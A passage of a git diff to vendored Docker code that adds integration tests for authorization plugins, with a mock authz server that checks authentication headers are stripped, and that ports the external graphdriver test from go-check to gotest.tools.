event.Type == eventtypes.ContainerEventType && event.Actor.ID == cID { + if event.Action == "create" { + created = true + } + if event.Action == "start" { + started = true + } + } + case err := <-errs: + if err == io.EOF { + t.Fatal("premature end of event stream") + } + assert.NilError(t, err) + case <-time.After(30 * time.Second): + // Fail the test + t.Fatal("event stream timeout") + } + } + + // Ensure both events and container endpoints are passed to the + // authorization plugin + assertURIRecorded(t, ctrl.requestsURIs, "/events") + assertURIRecorded(t, ctrl.requestsURIs, "/containers/create") + assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID)) +} + +func systemTime(t *testing.T, client client.APIClient, testEnv *environment.Execution) time.Time { + if testEnv.IsLocalDaemon() { + return time.Now() + } + + ctx := context.Background() + info, err := client.Info(ctx) + assert.NilError(t, err) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + assert.NilError(t, err, "invalid time format in GET /info response") + return dt +} + +func systemEventsSince(client client.APIClient, since string) (<-chan eventtypes.Message, <-chan error, func()) { + eventOptions := types.EventsOptions{ + Since: since, + } + ctx, cancel := context.WithCancel(context.Background()) + events, errs := client.Events(ctx, eventOptions) + + return events, errs, cancel +} + +func TestAuthZPluginErrorResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = true + ctrl.resRes.Err = errorMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage), err.Error()) +} + +func TestAuthZPluginErrorRequest(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Err = errorMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage), err.Error()) +} + +func TestAuthZPluginEnsureNoDuplicatePluginRegistration(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + + client, err := d.NewClient() + assert.NilError(t, err) + + _, err = client.ServerVersion(context.Background()) + assert.NilError(t, err) + + // assert plugin is only called once.. + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) +} + +func TestAuthZPluginEnsureLoadImportWorking(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + tmp, err := ioutil.TempDir("", "test-authz-load-import") + assert.NilError(t, err) + defer os.RemoveAll(tmp) + + savedImagePath := filepath.Join(tmp, "save.tar") + + err = imageSave(client, savedImagePath, "busybox") + assert.NilError(t, err) + err = imageLoad(client, savedImagePath) + assert.NilError(t, err) + + exportedImagePath := filepath.Join(tmp, "export.tar") + + cID := container.Run(t, ctx, client) + + responseReader, err := client.ContainerExport(context.Background(), cID) + assert.NilError(t, err) + defer responseReader.Close() + file, err := os.Create(exportedImagePath) + assert.NilError(t, err) + defer file.Close() + _, err = io.Copy(file, responseReader) + assert.NilError(t, err) + + err = imageImport(client, exportedImagePath) + assert.NilError(t, err) +} + +func TestAuthzPluginEnsureContainerCopyToFrom(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(dir) + + f, err := ioutil.TempFile(dir, "send") + assert.Assert(t, err) + defer f.Close() + + buf := make([]byte, 1024) + fileSize := len(buf) * 1024 * 10 + for written := 0; written < fileSize; { + n, err := f.Write(buf) + assert.Assert(t, err) + written += n + } + + ctx := context.Background() + client, err := d.NewClient() + assert.Assert(t, err) + + cID := container.Run(t, ctx, client) + defer client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{Force: true}) + + _, err = f.Seek(0, io.SeekStart) + assert.Assert(t, err) + + srcInfo, err := archive.CopyInfoSourcePath(f.Name(), false) + assert.Assert(t, err) + srcArchive, err := archive.TarResource(srcInfo) + assert.Assert(t, err) + defer srcArchive.Close() + + dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, archive.CopyInfo{Path: "/test"}) + assert.Assert(t, err) + + err = client.CopyToContainer(ctx, cID, dstDir, preparedArchive, types.CopyToContainerOptions{}) + assert.Assert(t, err) + + rdr, _, err := client.CopyFromContainer(ctx, cID, "/test") + assert.Assert(t, err) + _, err = io.Copy(ioutil.Discard, rdr) + assert.Assert(t, err) +} + +func imageSave(client client.APIClient, path, image string) error { + ctx := context.Background() + responseReader, err := client.ImageSave(ctx, []string{image}) + if err != nil { + return err + } + defer responseReader.Close() + file, err := os.Create(path) + if err != nil { + return err + } + defer file.Close() + _, err = io.Copy(file, responseReader) + return err +} + +func imageLoad(client client.APIClient, path string) error { + file, err := os.Open(path) + if err != nil { + return err + } + defer file.Close() + quiet := true + ctx := context.Background() + response, err := client.ImageLoad(ctx, file, quiet) + if err != nil { + return err + } + defer response.Body.Close() + return nil +} + +func imageImport(client client.APIClient, path string) error { + file, err := os.Open(path) + if err != nil { + return err + } + defer file.Close() + options := types.ImageImportOptions{} + ref := "" + source := types.ImageImportSource{ + Source: file, + SourceName: "-", + } + ctx := context.Background() + responseReader, err := client.ImageImport(ctx, source, ref, options) + if err != nil { + return err + } + defer responseReader.Close() + return nil +} + +func TestAuthZPluginHeader(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--debug", "--authorization-plugin="+testAuthZPlugin) + + daemonURL, err := url.Parse(d.Sock()) + assert.NilError(t, err) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + assert.NilError(t, err) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + assert.NilError(t, err) + resp, err := client.Do(req) + assert.NilError(t, err) + assert.Equal(t, "application/json", resp.Header["Content-Type"][0]) +} + +// assertURIRecorded verifies that the given URI was sent and recorded +// in the authz plugin +func assertURIRecorded(t *testing.T, uris []string, uri string) { + var found bool + for _, u := range uris { + if strings.Contains(u, uri) { + found = true + break + } + } + if !found { + t.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go new file mode 100644 index 0000000000..5ebaca41c6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go @@ -0,0 +1,175 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "context" + "fmt" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/requirement" + "gotest.tools/assert" + "gotest.tools/skip" +) + +var ( + authzPluginName = "riyaz/authz-no-volume-plugin" + authzPluginTag = "latest" + authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag + authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" + nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" +) + +func setupTestV2(t *testing.T) func() { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, !requirement.HasHubConnectivity(t)) + + teardown := setupTest(t) + + d.Start(t) + + return teardown +} + +func TestAuthZPluginV2AllowNonVolumeRequest(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + // start the daemon with the plugin and load busybox, --net=none build fails otherwise + // because it needs to pull busybox + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + d.LoadBusybox(t) + + // Ensure docker run command and accompanying docker ps are successful + cID := container.Run(t, ctx, client) + + _, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) +} + +func TestAuthZPluginV2Disable(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + d.LoadBusybox(t) + + _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + // disable the plugin + err = client.PluginDisable(context.Background(), authzPluginNameWithTag, types.PluginDisableOptions{}) + assert.NilError(t, err) + + // now test to see if the docker api works. + _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.NilError(t, err) +} + +func TestAuthZPluginV2RejectVolumeRequests(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + + // restart the daemon with the plugin + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + + _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumeList(context.Background(), filters.Args{}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + // The plugin will block the command before it can determine the volume does not exist + err = client.VolumeRemove(context.Background(), "test", false) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumeInspect(context.Background(), "test") + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumesPrune(context.Background(), filters.Args{}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) +} + +func TestAuthZPluginV2BadManifestFailsDaemonStart(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin with bad manifest + err = pluginInstallGrantAllPermissions(client, authzPluginBadManifestName) + assert.NilError(t, err) + + // start the daemon with the plugin, it will error + err = d.RestartWithError("--authorization-plugin=" + authzPluginBadManifestName) + assert.Assert(t, err != nil) + + // restarting the daemon without requiring the plugin will succeed + d.Start(t) +} + +func TestAuthZPluginV2NonexistentFailsDaemonStart(t *testing.T) { + defer setupTestV2(t)() + + // start the daemon with a non-existent authz plugin, it will error + err := d.RestartWithError("--authorization-plugin=" + nonexistentAuthzPluginName) + assert.Assert(t, err != nil) + + // restarting the daemon without requiring the plugin will succeed + d.Start(t) +} + +func pluginInstallGrantAllPermissions(client client.APIClient, name string) error { + ctx := context.Background() + options := types.PluginInstallOptions{ + RemoteRef: name, + AcceptAllPermissions: true, + } + responseReader, err := client.PluginInstall(ctx, "", options) + if err != nil { + return err + } + defer responseReader.Close() + // we have to read the response out here because the client API + // actually starts a goroutine which we can only be sure has + // completed when we get EOF from reading responseBody + _, err = ioutil.ReadAll(responseReader) + return err +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go new file mode 100644 index 0000000000..75555dc96f --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go @@ -0,0 +1,180 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "strings" + "testing" + + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/authorization" + "github.com/docker/docker/pkg/plugins" + "gotest.tools/skip" +) + +var ( + testEnv *environment.Execution + d *daemon.Daemon + server *httptest.Server +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + setupSuite() + exitCode := m.Run() + teardownSuite() + + os.Exit(exitCode) +} + +func setupTest(t *testing.T) func() { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + environment.ProtectAll(t, testEnv) + + d = daemon.New(t, daemon.WithExperimental) + + return func() { + if d != nil { + d.Stop(t) + } + testEnv.Clean(t) + } +} + +func setupSuite() { + mux := http.NewServeMux() + server = httptest.NewServer(mux) + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) + if err != nil { + panic("could not marshal json for /Plugin.Activate: " + err.Error()) + } + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + if err != nil { + panic("could not read body for /AuthZPlugin.AuthZReq: " + err.Error()) + } + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + if err != nil { + panic("could not unmarshal json for /AuthZPlugin.AuthZReq: " + err.Error()) + } + + assertBody(authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) + assertAuthHeaders(authReq.RequestHeaders) + + // Count only server version api + if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) { + ctrl.versionReqCount++ + } + + ctrl.requestsURIs = append(ctrl.requestsURIs, authReq.RequestURI) + + reqRes := ctrl.reqRes + if isAllowed(authReq.RequestURI) { + reqRes = authorization.Response{Allow: true} + } + if reqRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(reqRes) + if err != nil { + panic("could not marshal json for /AuthZPlugin.AuthZReq: " + err.Error()) + } + + ctrl.reqUser = authReq.User + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + if err != nil { + panic("could not read body for /AuthZPlugin.AuthZRes: " + err.Error()) + } + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + if err != nil { + panic("could not unmarshal json for /AuthZPlugin.AuthZRes: " + err.Error()) + } + + assertBody(authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) + assertAuthHeaders(authReq.ResponseHeaders) + + // Count only server version api + if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) { + ctrl.versionResCount++ + } + resRes := ctrl.resRes + if isAllowed(authReq.RequestURI) { + resRes = authorization.Response{Allow: true} + } + if resRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(resRes) + if err != nil { + panic("could not marshal json for /AuthZPlugin.AuthZRes: " + err.Error()) + } + ctrl.resUser = authReq.User + w.Write(b) + }) +} + +func teardownSuite() { + if server == nil { + return + } + + server.Close() +} + +// assertAuthHeaders validates authentication headers are removed +func assertAuthHeaders(headers map[string]string) error { + for k := range headers { + if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { + panic(fmt.Sprintf("Found authentication headers in request '%v'", headers)) + } + } + return nil +} + +// assertBody asserts that body is removed for non text/json requests +func assertBody(requestURI string, headers map[string]string, body []byte) { + if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { + panic("Body included for authentication endpoint " + string(body)) + } + + for k, v := range headers { + if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { + return + } + } + if len(body) > 0 { + panic(fmt.Sprintf("Body included while it should not (Headers: '%v')", headers)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go similarity index 50% rename from vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go rename to vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go index a794ca742d..3596056a84 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go +++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go @@ -1,8 +1,7 @@ -// +build !windows - -package main +package graphdriver import ( + "context" "encoding/json" "fmt" "io" @@ -10,29 +9,24 @@ import ( "net/http" "net/http/httptest" "os" - "strings" + "runtime" + "testing" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/vfs" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/requirement" + "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/plugins" - "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) -func init() { - check.Suite(&DockerExternalGraphdriverSuite{ - ds: &DockerSuite{}, - }) -} - -type DockerExternalGraphdriverSuite struct { - server *httptest.Server - jserver *httptest.Server - ds *DockerSuite - d *Daemon - ec map[string]*graphEventsCounter -} - type graphEventsCounter struct { activations int creations int @@ -50,44 +44,69 @@ type graphEventsCounter struct { diffsize int } -func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) -} - -func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) { - s.d.DumpStackAndQuit() -} - -func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) -} +func TestExternalGraphDriver(t *testing.T) { + skip.If(t, runtime.GOOS == "windows") + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, !requirement.HasHubConnectivity(t)) + + // Setup plugin(s) + ec := make(map[string]*graphEventsCounter) + sserver := setupPluginViaSpecFile(t, ec) + jserver := setupPluginViaJSONFile(t, ec) + // Create daemon + d := daemon.New(t, daemon.WithExperimental) + c := d.NewClientT(t) + + for _, tc := range []struct { + name string + test func(client.APIClient, *daemon.Daemon) func(*testing.T) + }{ + { + name: "json", + test: testExternalGraphDriver("json", ec), + }, + { + name: "spec", + test: testExternalGraphDriver("spec", ec), + }, + { + name: "pull", + test: testGraphDriverPull, + }, + } { + t.Run(tc.name, tc.test(c, d)) + } -func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) { - s.ec = make(map[string]*graphEventsCounter) - s.setUpPluginViaSpecFile(c) - s.setUpPluginViaJSONFile(c) + sserver.Close() + jserver.Close() + err := os.RemoveAll("/etc/docker/plugins") + assert.NilError(t, err) } -func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) { +func setupPluginViaSpecFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server { mux := http.NewServeMux() - s.server = httptest.NewServer(mux) + server := httptest.NewServer(mux) + + setupPlugin(t, ec, "spec", mux, []byte(server.URL)) - s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL)) + return server } -func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) { +func setupPluginViaJSONFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server { mux := http.NewServeMux() - s.jserver = httptest.NewServer(mux) + server := httptest.NewServer(mux) - p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL) + p := plugins.NewLocalPlugin("json-external-graph-driver", server.URL) b, err := json.Marshal(p) - c.Assert(err, check.IsNil) + assert.NilError(t, err) - s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b) + setupPlugin(t, ec, "json", mux, b) + + return server } -func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) { +func setupPlugin(t *testing.T, ec map[string]*graphEventsCounter, ext string, mux *http.ServeMux, b []byte) { + name := fmt.Sprintf("%s-external-graph-driver", ext) type graphDriverRequest struct { ID string `json:",omitempty"` Parent string `json:",omitempty"` @@ -106,7 +125,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex } respond := func(w http.ResponseWriter, data interface{}) { - w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json") + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") switch t := data.(type) { case error: fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error())) @@ -126,24 +145,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex } base, err := ioutil.TempDir("", name) - c.Assert(err, check.IsNil) + assert.NilError(t, err) vfsProto, err := vfs.Init(base, []string{}, nil, nil) - c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver")) + assert.NilError(t, err, "error initializing graph driver") driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil) - s.ec[ext] = &graphEventsCounter{} + ec[ext] = &graphEventsCounter{} mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].activations++ + ec[ext].activations++ respond(w, `{"Implements": ["GraphDriver"]}`) }) mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].init++ + ec[ext].init++ respond(w, "{}") }) mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].creations++ + ec[ext].creations++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -157,7 +176,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].creations++ + ec[ext].creations++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -171,7 +190,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].removals++ + ec[ext].removals++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -186,23 +205,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].gets++ + ec[ext].gets++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { return } + // TODO @gupta-ak: Figure out what to do here. dir, err := driver.Get(req.ID, req.MountLabel) if err != nil { respond(w, err) return } - respond(w, &graphDriverResponse{Dir: dir}) + respond(w, &graphDriverResponse{Dir: dir.Path()}) }) mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].puts++ + ec[ext].puts++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -217,7 +237,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].exists++ + ec[ext].exists++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -227,12 +247,12 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].stats++ + ec[ext].stats++ respond(w, &graphDriverResponse{Status: driver.Status()}) }) mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].cleanups++ + ec[ext].cleanups++ err := driver.Cleanup() if err != nil { respond(w, err) @@ -242,7 +262,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].metadata++ + ec[ext].metadata++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -258,7 +278,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].diff++ + ec[ext].diff++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -274,7 +294,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].changes++ + ec[ext].changes++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { return @@ -289,7 +309,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].applydiff++ + ec[ext].applydiff++ diff := r.Body defer r.Body.Close() @@ -309,7 +329,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].diffsize++ + ec[ext].diffsize++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -325,81 +345,118 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) err = os.MkdirAll("/etc/docker/plugins", 0755) - c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins")) + assert.NilError(t, err) specFile := "/etc/docker/plugins/" + name + "." + ext err = ioutil.WriteFile(specFile, b, 0644) - c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile)) + assert.NilError(t, err) } -func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) { - s.server.Close() - s.jserver.Close() - - err := os.RemoveAll("/etc/docker/plugins") - c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins")) +func testExternalGraphDriver(ext string, ec map[string]*graphEventsCounter) func(client.APIClient, *daemon.Daemon) func(*testing.T) { + return func(c client.APIClient, d *daemon.Daemon) func(*testing.T) { + return func(t *testing.T) { + driverName := fmt.Sprintf("%s-external-graph-driver", ext) + d.StartWithBusybox(t, "-s", driverName) + + ctx := context.Background() + + testGraphDriver(t, c, ctx, driverName, func(t *testing.T) { + d.Restart(t, "-s", driverName) + }) + + _, err := c.Info(ctx) + assert.NilError(t, err) + + d.Stop(t) + + // Don't check ec.exists, because the daemon no longer calls the + // Exists function. + assert.Check(t, is.Equal(ec[ext].activations, 2)) + assert.Check(t, is.Equal(ec[ext].init, 2)) + assert.Check(t, ec[ext].creations >= 1) + assert.Check(t, ec[ext].removals >= 1) + assert.Check(t, ec[ext].gets >= 1) + assert.Check(t, ec[ext].puts >= 1) + assert.Check(t, is.Equal(ec[ext].stats, 5)) + assert.Check(t, is.Equal(ec[ext].cleanups, 2)) + assert.Check(t, ec[ext].applydiff >= 1) + assert.Check(t, is.Equal(ec[ext].changes, 1)) + assert.Check(t, is.Equal(ec[ext].diffsize, 0)) + assert.Check(t, is.Equal(ec[ext].diff, 0)) + assert.Check(t, is.Equal(ec[ext].metadata, 1)) + } + } } -func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) { - testRequires(c, ExperimentalDaemon) +func testGraphDriverPull(c client.APIClient, d *daemon.Daemon) func(*testing.T) { + return func(t *testing.T) { + d.Start(t) + defer d.Stop(t) + ctx := context.Background() - s.testExternalGraphDriver("test-external-graph-driver", "spec", c) - s.testExternalGraphDriver("json-external-graph-driver", "json", c) -} + r, err := c.ImagePull(ctx, "busybox:latest", types.ImagePullOptions{}) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) -func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) { - if err := s.d.StartWithBusybox("-s", name); err != nil { - b, _ := ioutil.ReadFile(s.d.LogFileName()) - c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b))) + container.Run(t, ctx, c, container.WithImage("busybox:latest")) } +} - out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello") - c.Assert(err, check.IsNil, check.Commentf(out)) - - err = s.d.Restart("-s", name) - - out, err = 